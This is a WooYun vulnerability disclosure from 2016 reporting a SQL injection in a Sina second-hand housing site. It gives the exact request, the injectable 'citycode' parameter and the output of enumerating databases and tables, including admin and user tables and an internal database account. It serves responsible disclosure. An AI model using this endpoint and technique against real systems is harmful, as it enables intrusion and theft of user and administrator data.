当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0200165

漏洞标题:新浪某站MySQL注射(支持三种查询/全城市站点数据/管理员数据)

相关厂商:新浪

漏洞作者: Aasron

提交时间:2016-04-24 19:58

修复时间:2016-06-11 15:50

公开时间:2016-06-11 15:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-04-24: 细节已通知厂商并且等待厂商处理中
2016-04-27: 厂商已经确认,细节仅向厂商公开
2016-05-07: 细节向核心白帽子及相关领域专家公开
2016-05-17: 细节向普通白帽子公开
2016-05-27: 细节向实习白帽子公开
2016-06-11: 细节向公众公开

简要描述:

新浪某站MySQL注射(支持三种查询)

详细说明:

GET /di/positioncommunity/?citycode=cd&x=104.03249595349092&y=30.607376004698764&callback=jsonp4&_=1461490791828 HTTP/1.1
Host: cd.esf.sina.com.cn
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13E238 KoudailejuApp
Accept-Language: zh-cn
Referer: http://m.leju.com/touch/esf/cd?ln=ljmf_h5&source=ios&s=yd_kdlj
Accept-Encoding: gzip, deflate


新浪二手房站点

注入参数#citycode


漏洞证明:

1.png


布尔注入

1.png


UNION联合查询

1.png


全国64个库

[*] information_sch
[*] mysql
[*] performance_sch
[*] shop_admin
[*] shop_anshan
[*] shop_bt
[*] shop_cc
[*] shop_cd
[*] shop_cq
[*] shop_cs
[*] shop_cz
[*] shop_dg
[*] shop_dl
[*] shop_fs
[*] shop_fushun
[*] shop_fz
[*] shop_gg
[*] shop_gl
[*] shop_gy
[*] shop_gz
[*] shop_haikou
[*] shop_heb
[*] shop_hf
[*] shop_hhht
[*] shop_huizhou
[*] shop_hz
[*] shop_jn
[*] shop_km
[*] shop_ks
[*] shop_lanzhou
[*] shop_lw
[*] shop_nb
[*] shop_nc
[*] shop_nj
[*] shop_nn
[*] shop_nt
[*] shop_qd
[*] shop_qhd
[*] shop_sanya
[*] shop_sh
[*] shop_sjz
[*] shop_suzhou
[*] shop_sy
[*] shop_sz
[*] shop_tangshan
[*] shop_ty
[*] shop_weifang
[*] shop_weihai
[*] shop_wh
[*] shop_wlmq
[*] shop_wuhu
[*] shop_wx
[*] shop_xian
[*] shop_xm
[*] shop_xz
[*] shop_yangzhou
[*] shop_yinchuan
[*] shop_yt
[*] shop_zb
[*] shop_zhengzhou
[*] shop_zhongshan
[*] shop_zhuhai
[*] shop_zz
[*] test


ad_list
ad_name
ad_time
community_distanceset
community_distanceset
community_stype
community_stype_set
community_stype_set_l
count_house_avgprice
dict_districtblock
dict_districtblock_me
es_home_compare
es_home_spider
es_pinzhuan_keyword
es_pinzhuan_keyword_w
es_pinzhuan_status
esf_acl_access
esf_acl_role
esf_acl_role_access
esf_acl_user
esf_acl_user_role
esf_city_price
esf_delegate_agent
esf_delegate_house
esf_delegate_pic
esf_home_apply
esf_home_fangjia
esf_home_info
esf_home_info_ext
esf_home_info_tmp_jia
esf_home_jiaju
esf_home_othername
esf_home_pic_fx
esf_home_pic_xq
esf_home_pinzhuan
esf_home_price
esf_home_relation
esf_home_score
esf_home_setting
esf_home_subway
esf_home_transfer
esf_home_user
esf_home_usertop
esf_home_weixin
esf_home_zhida
esf_house_chuchuang
esf_house_rzassign
esf_house_rzassign_lo
esf_house_rzassign_us
esf_house_tag
esf_house_urlwhite
esf_shop_house
esf_shop_house_assign
esf_shop_house_pic
esf_sitemap
esf_smsout
esf_user_helperpic
esf_user_mainhome
esf_user_shop
esf_weixin_log
esf_weixin_menu
esf_weixin_passport
esf_weixin_passport2
esf_weixin_subscribe
esf_weixin_subscribe_
esf_weixin_ticket
esf_weixin_ticket_use
esf_weixin_user
fnj_agent
job_distribute
job_log
mobile_pocketagent_bo
mobile_sendmessage_lo
push_data_log
sp_agentphone
sp_lime
sp_log
sp_member
sp_notice
sp_pay_log
sp_permission
sp_pwd_log
sp_role
sp_role_permission
sp_sys_user
sp_sys_userpermission
sp_user
sp_user_bj
sp_user_del_log
sp_user_ext
sp_user_ext_sh
sp_user_loginlog
sp_user_pic
sp_user_sh
sp_weixin_log
sp_weixin_user
test


当前数据库:'shop_admin'
当前数据库用户:'esfleju@10.71.32.%'

修复方案:

过滤

版权声明:转载请注明来源 Aasron@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2016-04-27 15:49

厂商回复:

感谢关注新浪安全,问题修复中。

最新状态:

暂无